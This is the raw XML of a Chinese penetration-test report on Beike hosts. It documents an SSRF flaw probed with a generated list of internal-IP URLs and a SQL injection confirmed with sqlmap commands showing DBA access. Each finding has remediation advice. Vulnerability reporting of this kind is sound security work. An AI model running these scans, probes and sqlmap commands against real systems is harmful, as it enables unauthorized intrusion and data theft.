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贝壳安全测试报告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贝壳某处ssrf漏洞可探测内网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漏洞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url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instrText xml:space="preserve"> HYPERLINK "http://211.159.232.113/" </w:instrTex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http://211.159.232.113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-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>漏洞级别：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严重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kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>漏洞详情：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t>ip搜集自net:211.159.232.0/24该c段中存在大量贝壳主机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访问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url地址：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instrText xml:space="preserve"> HYPERLINK "http://211.159.232.113/" </w:instrTex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http://211.159.232.113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746500" cy="7092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当前页面虽然显示空白，但这里网站不一定就没有功能点可测试了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所以使用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nmap扫描端口及dirsearch枚举路径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nmap扫描结果：nmap -T4 -A -v -Pn 211.159.232.113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650615" cy="2771140"/>
            <wp:effectExtent l="0" t="0" r="698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网站只开放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22端口及80端口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dirsearch扫描结果：dirsearch -u "http://211.159.232.113/" --exclude-status=500,403 -e *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818890" cy="176339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当前网站存在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lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>http://211.159.232.113/p/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路径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浏览器访问该路径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776980" cy="825500"/>
            <wp:effectExtent l="0" t="0" r="139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网站当前页面显示是一个转换网址的接口，并且默认填写了内网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ip，故推断存在ssrf漏洞，首先在输入框中输入公网域名进行测试：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instrText xml:space="preserve"> HYPERLINK "http://211.159.232.113/p/index.php?page=https://www.baidu.com/" </w:instrTex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http://211.159.232.113/p/index.php?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>page=</w:t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https%3A%2F%2Fwww.baidu.com%2F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794125" cy="1655445"/>
            <wp:effectExtent l="0" t="0" r="158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page参数可控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，该服务器可以将指定的域名页面成功加载出来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但我们现在无法判断该主机究竟处于什么内网段中，首先使用输入框中默认的内网ip段进行测试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Python脚本生成指定c段ip：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def run():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for i in range(0,256):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      print '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instrText xml:space="preserve"> HYPERLINK "http://211.159.232.113/p/index.php?page=" </w:instrTex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http://211.159.232.113/p/index.php?page=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10.155.140.' + str(i)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if __name__ == '__main__':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run()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python poc.py &gt;&gt; ip.txt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cat ip.txt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820160" cy="2274570"/>
            <wp:effectExtent l="0" t="0" r="889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以上为文件内容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接下来直接使用whatweb -i ip.txt就可以通过返回的title信息判断是否读取到了内网的主机信息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651885" cy="1469390"/>
            <wp:effectExtent l="0" t="0" r="571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这个网段似乎没有读取到东西，但在这里我们如何去证明判断可以成功利用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ssrf读取内网信息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将子域名爆破时所搜集到的内网ip生成清单继续进行测试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303270" cy="2651125"/>
            <wp:effectExtent l="0" t="0" r="1143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通过读取我们本地的路由地址，来判断当前测试的主机会不会经过我们内网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首先访问我们本机的路由地址：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http://192.168.50.1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287395" cy="1765300"/>
            <wp:effectExtent l="0" t="0" r="825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然后使用ssrf漏洞地址去访问：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instrText xml:space="preserve"> HYPERLINK "http://211.159.232.113/p/index.php?page=https://www.baidu.com/" </w:instrTex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sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http://211.159.232.113/p/index.php?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>page=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http://192.168.50.1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如果页面读取不出我们路由的地址，则证明当前测试的主机确实是访问了他当前所在的内网段中的192.168.50.1主机，故存在ssrf漏洞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376930" cy="631190"/>
            <wp:effectExtent l="0" t="0" r="1397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-CN"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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1.使用白名单的方式限制访问的url地址</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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2.过滤内网ip地址</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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color w:val="auto"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3.根据业务需求限制网络请求类型</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="4"/>
          <w:rFonts w:hint="default" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorEastAsia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Style w:val="4"/>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2.贝壳某处python-django-sql注入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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漏洞级别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：高危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漏洞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url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"http://211.159.232.123/"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http://211.159.232.123/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漏洞详情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：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="212661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/>
          <w:u w:val="none"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>url，页面提示404错误，我们根据报错寻找关键的信息，d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jango的路由函数首先会使用正则匹配^report$及^test$下的url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是否存在，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如果url存在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"http://211.159.232.123/" </w:instrTex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，则使用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render_to_respons()函数返回 http response对象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访问url：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/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u w:val="none"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>http://211.159.232.123/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report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2313940"/>
            <wp:effectExtent l="0" t="0" r="1206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输入框内输入日期然后点击搜索，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>burp抓取http请求包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818765"/>
            <wp:effectExtent l="0" t="0" r="381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http请求如下：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/report?date=20191214 HTTP/1.1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211.159.232.123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Upgrade-Insecure-Requests: 1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(X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.71 Safari/537.36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text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3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http://211.159.232.123/report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zh-CN,zh;q=0.9,en;q=0.8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517015"/>
            <wp:effectExtent l="0" t="0" r="3175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加单引号http返回sql语句错误，存在sql注入漏洞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sqlmap测试：sqlmap -u "http://211.159.232.123/report?date=20191214" -p date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</w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5262880" cy="3152775"/>
            <wp:effectExtent l="0" t="0" r="1397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194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数据库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tabs>
          <w:tab w:val="left" w:pos="1941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sqlmap测试：sqlmap -u "http://211.159.232.123/report?date=20191214" --is-dba      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</w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5262880" cy="2479675"/>
            <wp:effectExtent l="0" t="0" r="13970" b="158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当前数据库权限：dba权限，可直接getshell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sqlmap测试：sqlmap -u "http://211.159.232.123/report?date=20191214" --dbs         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当前数据库内容：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</w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5262880" cy="3142615"/>
            <wp:effectExtent l="0" t="0" r="1397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13个数据库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修复方案：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1.黑白名单过滤特殊字符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2.使用sql预编译参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数化查询语句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3.遵循权限最小原则</w:t>
      </w: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tabs>
          <w:tab w:val="left" w:pos="3055"/>
        </w:tabs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Bitstream Vera San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Bitstream Vera San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a Sans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281894"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="692818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F39F47"/>
    <w:rsid w:val="07FFE2A3"/>
    <w:rsid w:val="09E78DD3"/>
    <w:rsid w:val="17CB6296"/>
    <w:rsid w:val="1AFF89D0"/>
    <w:rsid w:val="1BFF05B3"/>
    <w:rsid w:val="1F78E600"/>
    <w:rsid w:val="1FB71F5E"/>
    <w:rsid w:val="1FD7624E"/>
    <w:rsid w:val="1FD7A9B1"/>
    <w:rsid w:val="1FFF8C51"/>
    <w:rsid w:val="2673F944"/>
    <w:rsid w:val="2D4B4315"/>
    <w:rsid w:val="2E6BF1D8"/>
    <w:rsid w:val="367A501B"/>
    <w:rsid w:val="37D76E11"/>
    <w:rsid w:val="37EDF929"/>
    <w:rsid w:val="37FE238E"/>
    <w:rsid w:val="3977040F"/>
    <w:rsid w:val="39BCB5D6"/>
    <w:rsid w:val="39F7BF90"/>
    <w:rsid w:val="3DDD5CCE"/>
    <w:rsid w:val="3DFE0CD4"/>
    <w:rsid w:val="3EFF9329"/>
    <w:rsid w:val="3FB7E877"/>
    <w:rsid w:val="3FD7A4B3"/>
    <w:rsid w:val="3FDFCCE9"/>
    <w:rsid w:val="3FECD5FF"/>
    <w:rsid w:val="49FF4987"/>
    <w:rsid w:val="4D6B603E"/>
    <w:rsid w:val="4D7CC509"/>
    <w:rsid w:val="4DB644A5"/>
    <w:rsid w:val="4DFBD9DB"/>
    <w:rsid w:val="4FAFC563"/>
    <w:rsid w:val="4FDBC093"/>
    <w:rsid w:val="55D513E9"/>
    <w:rsid w:val="56DD071F"/>
    <w:rsid w:val="5777BC5C"/>
    <w:rsid w:val="57BFDA69"/>
    <w:rsid w:val="57F73029"/>
    <w:rsid w:val="5BDBE18F"/>
    <w:rsid w:val="5CB8E11D"/>
    <w:rsid w:val="5D4B90AD"/>
    <w:rsid w:val="5DF6CDDA"/>
    <w:rsid w:val="5DFBE307"/>
    <w:rsid w:val="5DFFF11C"/>
    <w:rsid w:val="5F6F5C6B"/>
    <w:rsid w:val="5F7DB63E"/>
    <w:rsid w:val="5F9D9F10"/>
    <w:rsid w:val="5FF79FDC"/>
    <w:rsid w:val="5FFF25DC"/>
    <w:rsid w:val="65F096FC"/>
    <w:rsid w:val="677DB989"/>
    <w:rsid w:val="679F18D2"/>
    <w:rsid w:val="6BC73E76"/>
    <w:rsid w:val="6BDF7567"/>
    <w:rsid w:val="6CFF079C"/>
    <w:rsid w:val="6D5CBEF8"/>
    <w:rsid w:val="6ED7BAA7"/>
    <w:rsid w:val="6F768A04"/>
    <w:rsid w:val="6F99AB35"/>
    <w:rsid w:val="6F9B0CC5"/>
    <w:rsid w:val="6FB71EC6"/>
    <w:rsid w:val="6FDF0E41"/>
    <w:rsid w:val="70B5EC81"/>
    <w:rsid w:val="71B359B5"/>
    <w:rsid w:val="71B76AE0"/>
    <w:rsid w:val="72DF3FE8"/>
    <w:rsid w:val="73EA8C53"/>
    <w:rsid w:val="744DD6E3"/>
    <w:rsid w:val="75BB96B5"/>
    <w:rsid w:val="75FDE552"/>
    <w:rsid w:val="76BD0E01"/>
    <w:rsid w:val="76CF0749"/>
    <w:rsid w:val="76FFDAB7"/>
    <w:rsid w:val="77DF0AED"/>
    <w:rsid w:val="77F6E8F3"/>
    <w:rsid w:val="77FD3802"/>
    <w:rsid w:val="78F962A1"/>
    <w:rsid w:val="7A754A5A"/>
    <w:rsid w:val="7ABED802"/>
    <w:rsid w:val="7AF39F47"/>
    <w:rsid w:val="7AFB448E"/>
    <w:rsid w:val="7AFD05FB"/>
    <w:rsid w:val="7B7B03AD"/>
    <w:rsid w:val="7BBBBD79"/>
    <w:rsid w:val="7BEF94E9"/>
    <w:rsid w:val="7BFDEFA3"/>
    <w:rsid w:val="7BFED721"/>
    <w:rsid w:val="7BFF2D36"/>
    <w:rsid w:val="7BFFC400"/>
    <w:rsid w:val="7C672DD2"/>
    <w:rsid w:val="7CC1EE62"/>
    <w:rsid w:val="7D5AC45C"/>
    <w:rsid w:val="7D5DED5F"/>
    <w:rsid w:val="7D7E4329"/>
    <w:rsid w:val="7DABD0B7"/>
    <w:rsid w:val="7DCF1901"/>
    <w:rsid w:val="7DDE9640"/>
    <w:rsid w:val="7DDFB327"/>
    <w:rsid w:val="7DF71C38"/>
    <w:rsid w:val="7DFE8F72"/>
    <w:rsid w:val="7EA36B5A"/>
    <w:rsid w:val="7EB5FF70"/>
    <w:rsid w:val="7ED93528"/>
    <w:rsid w:val="7EDF863E"/>
    <w:rsid w:val="7F3D79F5"/>
    <w:rsid w:val="7F7727CF"/>
    <w:rsid w:val="7F7AA7A4"/>
    <w:rsid w:val="7F7C54FF"/>
    <w:rsid w:val="7F7F0E84"/>
    <w:rsid w:val="7F9F6E99"/>
    <w:rsid w:val="7FB7C4F4"/>
    <w:rsid w:val="7FB7E14B"/>
    <w:rsid w:val="7FBC3B00"/>
    <w:rsid w:val="7FBF194D"/>
    <w:rsid w:val="7FCF179D"/>
    <w:rsid w:val="7FD32BE1"/>
    <w:rsid w:val="7FD733FE"/>
    <w:rsid w:val="7FDDCAFA"/>
    <w:rsid w:val="7FF7624C"/>
    <w:rsid w:val="7FF88E6E"/>
    <w:rsid w:val="7FFDAC9B"/>
    <w:rsid w:val="7FFDD3CB"/>
    <w:rsid w:val="7FFE98BB"/>
    <w:rsid w:val="8BB7C5FF"/>
    <w:rsid w:val="8F2FC45B"/>
    <w:rsid w:val="977F0F28"/>
    <w:rsid w:val="97FF70B6"/>
    <w:rsid w:val="98FF320E"/>
    <w:rsid w:val="99AF96AA"/>
    <w:rsid w:val="9EFE5A57"/>
    <w:rsid w:val="A3FF67AB"/>
    <w:rsid w:val="A5FBEE77"/>
    <w:rsid w:val="A6FDC02A"/>
    <w:rsid w:val="AC21AFD5"/>
    <w:rsid w:val="AC592812"/>
    <w:rsid w:val="AD9775FB"/>
    <w:rsid w:val="AF7E10A4"/>
    <w:rsid w:val="AF7FB0C4"/>
    <w:rsid w:val="B6EF8155"/>
    <w:rsid w:val="B7552C4C"/>
    <w:rsid w:val="B7F720C6"/>
    <w:rsid w:val="B94D9F32"/>
    <w:rsid w:val="B97CC5B2"/>
    <w:rsid w:val="B9EABFE3"/>
    <w:rsid w:val="BBFE2288"/>
    <w:rsid w:val="BCB36BD6"/>
    <w:rsid w:val="BCE61419"/>
    <w:rsid w:val="BD75BE95"/>
    <w:rsid w:val="BF37BC66"/>
    <w:rsid w:val="BF770243"/>
    <w:rsid w:val="BFBB943F"/>
    <w:rsid w:val="BFCF95C7"/>
    <w:rsid w:val="BFDF492B"/>
    <w:rsid w:val="BFE6A872"/>
    <w:rsid w:val="BFF3A9A0"/>
    <w:rsid w:val="BFF71870"/>
    <w:rsid w:val="BFFFD1C7"/>
    <w:rsid w:val="C2F778D8"/>
    <w:rsid w:val="C6FFDA20"/>
    <w:rsid w:val="C7D73A58"/>
    <w:rsid w:val="C7FE56F3"/>
    <w:rsid w:val="CBED8A8C"/>
    <w:rsid w:val="D1FF77C9"/>
    <w:rsid w:val="D57ADF64"/>
    <w:rsid w:val="D5EF3D6F"/>
    <w:rsid w:val="D5EFD113"/>
    <w:rsid w:val="D6FF13F0"/>
    <w:rsid w:val="DAFF98E2"/>
    <w:rsid w:val="DCFFB838"/>
    <w:rsid w:val="DDEE0D6B"/>
    <w:rsid w:val="DDFEA0CB"/>
    <w:rsid w:val="DEEF41A4"/>
    <w:rsid w:val="DF37A75B"/>
    <w:rsid w:val="DF66E066"/>
    <w:rsid w:val="DF692226"/>
    <w:rsid w:val="DF9C3FD6"/>
    <w:rsid w:val="DFFB60B6"/>
    <w:rsid w:val="E0DFDC35"/>
    <w:rsid w:val="E4BB33DD"/>
    <w:rsid w:val="E5E0B2C7"/>
    <w:rsid w:val="E61DAD4B"/>
    <w:rsid w:val="E6BD65E5"/>
    <w:rsid w:val="E7DB9F4D"/>
    <w:rsid w:val="E7F5F1FF"/>
    <w:rsid w:val="E8BFAF99"/>
    <w:rsid w:val="E93B0999"/>
    <w:rsid w:val="EAFE03CA"/>
    <w:rsid w:val="EBBEA249"/>
    <w:rsid w:val="EBD332CB"/>
    <w:rsid w:val="EBF7C860"/>
    <w:rsid w:val="EC1F5EFE"/>
    <w:rsid w:val="ED55D29A"/>
    <w:rsid w:val="EDEA17F1"/>
    <w:rsid w:val="EDFA7D64"/>
    <w:rsid w:val="EE3BBF08"/>
    <w:rsid w:val="EE76AD02"/>
    <w:rsid w:val="EECC5F57"/>
    <w:rsid w:val="EEEA9B09"/>
    <w:rsid w:val="EF77F46A"/>
    <w:rsid w:val="EFBF3959"/>
    <w:rsid w:val="EFC78AF8"/>
    <w:rsid w:val="EFE722F0"/>
    <w:rsid w:val="EFF39AA1"/>
    <w:rsid w:val="EFFB812A"/>
    <w:rsid w:val="F3BF0AAD"/>
    <w:rsid w:val="F3DF1793"/>
    <w:rsid w:val="F534C419"/>
    <w:rsid w:val="F5F73B41"/>
    <w:rsid w:val="F5FD070C"/>
    <w:rsid w:val="F65F0768"/>
    <w:rsid w:val="F6D9B9DC"/>
    <w:rsid w:val="F7731825"/>
    <w:rsid w:val="F77ED8B5"/>
    <w:rsid w:val="F77FD6BF"/>
    <w:rsid w:val="F79B2101"/>
    <w:rsid w:val="F79F7F77"/>
    <w:rsid w:val="F79FB1D9"/>
    <w:rsid w:val="F7BC2A93"/>
    <w:rsid w:val="F7BF7BC7"/>
    <w:rsid w:val="F7F64A82"/>
    <w:rsid w:val="F7FFDA82"/>
    <w:rsid w:val="F89D8F8F"/>
    <w:rsid w:val="F96F10CE"/>
    <w:rsid w:val="F9FD7941"/>
    <w:rsid w:val="FAEBE1EC"/>
    <w:rsid w:val="FB5F114B"/>
    <w:rsid w:val="FBB76574"/>
    <w:rsid w:val="FBFC4364"/>
    <w:rsid w:val="FBFDA119"/>
    <w:rsid w:val="FBFE1BE2"/>
    <w:rsid w:val="FBFF05FC"/>
    <w:rsid w:val="FBFFA3A1"/>
    <w:rsid w:val="FCDF2C55"/>
    <w:rsid w:val="FD5716EF"/>
    <w:rsid w:val="FD6D210D"/>
    <w:rsid w:val="FD9FC73D"/>
    <w:rsid w:val="FDBF7063"/>
    <w:rsid w:val="FDF73C3B"/>
    <w:rsid w:val="FDF7832F"/>
    <w:rsid w:val="FDFD680E"/>
    <w:rsid w:val="FDFF2708"/>
    <w:rsid w:val="FDFF79C5"/>
    <w:rsid w:val="FDFF94DC"/>
    <w:rsid w:val="FE671777"/>
    <w:rsid w:val="FE7EC3E3"/>
    <w:rsid w:val="FED5B188"/>
    <w:rsid w:val="FEDA6369"/>
    <w:rsid w:val="FEDF2797"/>
    <w:rsid w:val="FEE70F30"/>
    <w:rsid w:val="FEF7927F"/>
    <w:rsid w:val="FEFB870E"/>
    <w:rsid w:val="FEFDFD5E"/>
    <w:rsid w:val="FF6DA61D"/>
    <w:rsid w:val="FF7C2C6A"/>
    <w:rsid w:val="FF7EE0D7"/>
    <w:rsid w:val="FF88C007"/>
    <w:rsid w:val="FF9D8892"/>
    <w:rsid w:val="FFA6B7EA"/>
    <w:rsid w:val="FFBCA04F"/>
    <w:rsid w:val="FFBF84A5"/>
    <w:rsid w:val="FFBFEB38"/>
    <w:rsid w:val="FFE76878"/>
    <w:rsid w:val="FFEE0C19"/>
    <w:rsid w:val="FFF23E27"/>
    <w:rsid w:val="FFF79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2019-12-14T15:31:00Z</dcterms:created>
  <dc:creator>root</dc:creator>
  <cp:lastModifiedBy>root</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-12-14T10:56:40Z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